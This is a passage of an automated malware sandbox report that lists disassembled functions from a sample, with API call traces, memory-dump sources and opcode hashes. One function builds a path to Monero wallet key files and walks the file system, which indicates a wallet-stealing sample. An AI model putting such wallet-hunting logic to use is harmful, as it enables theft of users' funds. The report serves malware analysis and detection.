                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E615B8,00E60D96), ref: 00E4F71E
                                  • StrCmpCA.SHLWAPI(?,00E615BC), ref: 00E4F76F
                                  • StrCmpCA.SHLWAPI(?,00E615C0), ref: 00E4F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E4FAC3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: b14ec3cb64f64cf45923836c01a7f51de4629b26966d2d61be8cfe0f58c75f46
                                  • Instruction ID: ef8740f52c2910ff98ef2be27c2feb47d97976ddc7fa6f66566177c540508f13
                                  • Opcode Fuzzy Hash: b14ec3cb64f64cf45923836c01a7f51de4629b26966d2d61be8cfe0f58c75f46
                                  • Instruction Fuzzy Hash: 0B11753180411D9BDB18EB60EC599ED73B8AF10301F445BBAA91A67492EF302B4EC792
                                  Function 010F775B Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: fag;
                                  • API String ID: 0-3987456656
                                  • Opcode ID: f853d83219a1214908cfce307361d0eb6fa7facba4bbd5c473b6717dfe787296
                                  • Instruction ID: dcffcbae420370c76b3d9dbec14817b93d2283b503de2fc3778581d4e3e266ec
                                  • Opcode Fuzzy Hash: f853d83219a1214908cfce307361d0eb6fa7facba4bbd5c473b6717dfe787296
                                  • Instruction Fuzzy Hash: 3B717BF3E182085BE3046D29DC897BAFAD6EBD4320F1F463DDBC997380E87958054296
                                  Function 010AC693 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: i>v
                                  • API String ID: 0-3125800013
                                  • Opcode ID: 42ec717cc9a8388b6c99f9a3ae40737a6675b38e7330ffe7ca8270cc17d17921
                                  • Instruction ID: ceffc669c5a8ee904b39349109f5b49ba45243ceda39e059b427108b13a61afd
                                  • Opcode Fuzzy Hash: 42ec717cc9a8388b6c99f9a3ae40737a6675b38e7330ffe7ca8270cc17d17921
                                  • Instruction Fuzzy Hash: 556129F3A082049BF3086E2DDC8577AF7D5EBD4320F1A463DEAC593784E93968058696
                                  Function 01115D76 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: R|Zv
                                  • API String ID: 0-3835291862
                                  • Opcode ID: 38aeabde7d4f7eb3b633311dda8277d681582a5a277e516484052009589333b1
                                  • Instruction ID: 41cc28d817cf70feb984a4ef0c87829da78a4eec1c301042123866ac9f759d9c
                                  • Opcode Fuzzy Hash: 38aeabde7d4f7eb3b633311dda8277d681582a5a277e516484052009589333b1
                                  • Instruction Fuzzy Hash: 9B51B0B3D082148FE304AE6CDC4537AB7E5EB54310F2A493DE9C8D3784EA7958448B96
                                  Function 010F563D Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @ww
                                  • API String ID: 0-848741344
                                  • Opcode ID: 91835224af7b34e4a324bf0532c15c9f6f9758eb9e11ba89deb6885b1717cc2f
                                  • Instruction ID: 2c76687a2e357605c4a0736f02264611c737a3b2e211f25914df648dea15e218
                                  • Opcode Fuzzy Hash: 91835224af7b34e4a324bf0532c15c9f6f9758eb9e11ba89deb6885b1717cc2f
                                  • Instruction Fuzzy Hash: C55145B3A082145BE3086A2DDC1937ABBE6DBC0720F2A463DDB95977C4E938580586D6
                                  Function 011B23D6 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: CjZo
                                  • API String ID: 0-1895608110
                                  • Opcode ID: aeba2ee32d5a9570889c27599b28dc65ab39013b21254d5954fe0619df401548
                                  • Instruction ID: 4ce6140948f8bd0637be9f597b6156559cc566afdf9489e5af9fb176d288ce25
                                  • Opcode Fuzzy Hash: aeba2ee32d5a9570889c27599b28dc65ab39013b21254d5954fe0619df401548
                                  • Instruction Fuzzy Hash: EE5129F3E182009BE3046A28DD4977BB7D6DBD4320F2A863DEBC893784D93D4C458696
                                  Function 01215807 Relevance: .5, Instructions: 521COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1bf4c8bb9e18d55097cfe061fd85202d3f538a393b97dfbb2bd1f62b800605c4
                                  • Instruction ID: 383a6aeaf43a08e72b0c3341612b9b5fb2a82f256cfe7c5214b5476b5376d988
                                  • Opcode Fuzzy Hash: 1bf4c8bb9e18d55097cfe061fd85202d3f538a393b97dfbb2bd1f62b800605c4
                                  • Instruction Fuzzy Hash: 41F114F390C2149FD304AE2DEC856BABBE9EF94720F1A4A2DE9C5D3740E63558448787
                                  Function 0111D6D3 Relevance: .2, Instructions: 242COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90df8d3a2594b5e6bd267f6ab6eeed66880bb1de5f6c72cbb0987a7c1df8b1e3
                                  • Instruction ID: 8d1a8c890af9317b417c12aa1bc58f92d3afd1b65e484c6011614b68aec165ac
                                  • Opcode Fuzzy Hash: 90df8d3a2594b5e6bd267f6ab6eeed66880bb1de5f6c72cbb0987a7c1df8b1e3
                                  • Instruction Fuzzy Hash: FA7139F3E082145FF3145E29ECC57BAF7D9EB98320F1A463EEA8493784D9791C058692
                                  Function 011D3502 Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce362473a81ed0bd5a4b957e15dbf52c6a17b6cfbe0d6bdbcabfb5ace82bcca2
                                  • Instruction ID: 662df741f97d18b2b1d05d8b4e1e02277ffabde377d6bb84f3432b2bfcda5232
                                  • Opcode Fuzzy Hash: ce362473a81ed0bd5a4b957e15dbf52c6a17b6cfbe0d6bdbcabfb5ace82bcca2
                                  • Instruction Fuzzy Hash: 495127F3E042145BF3009E2DDC8572AB7E6EBE4720F2B853DEAC8D3744E97599058692
                                  Function 010D8B44 Relevance: .2, Instructions: 159COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd7255747054fafbbab3aed6ddab902484e890b2b94ebeb55828602beeed4d5f
                                  • Instruction ID: 5f52d82ef1dc5c77f2115ecd53d89ead8a26971116ab2b470ed399f09ad269f3
                                  • Opcode Fuzzy Hash: bd7255747054fafbbab3aed6ddab902484e890b2b94ebeb55828602beeed4d5f
                                  • Instruction Fuzzy Hash: D751E1B3D482249FE3147A68DC4576ABBE9EF58720F1B093CDAD897380E679184086C7
                                  Function 01187C5C Relevance: .2, Instructions: 155COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 95d4adf3f7773cd8cb8b62aeb13e64cebafbf77f126984b5f02a843efccba468
                                  • Instruction ID: 68003c6251874fde7d4d27d1e0c30d0e58dae87796cdf53569114e46e5c3b126
                                  • Opcode Fuzzy Hash: 95d4adf3f7773cd8cb8b62aeb13e64cebafbf77f126984b5f02a843efccba468
                                  • Instruction Fuzzy Hash: C4415BB3E082149BE3082E2CDC953BAB7D5EB54320F2B053DDA89D7780E9394D0187C6
                                  Function 01281D4E Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
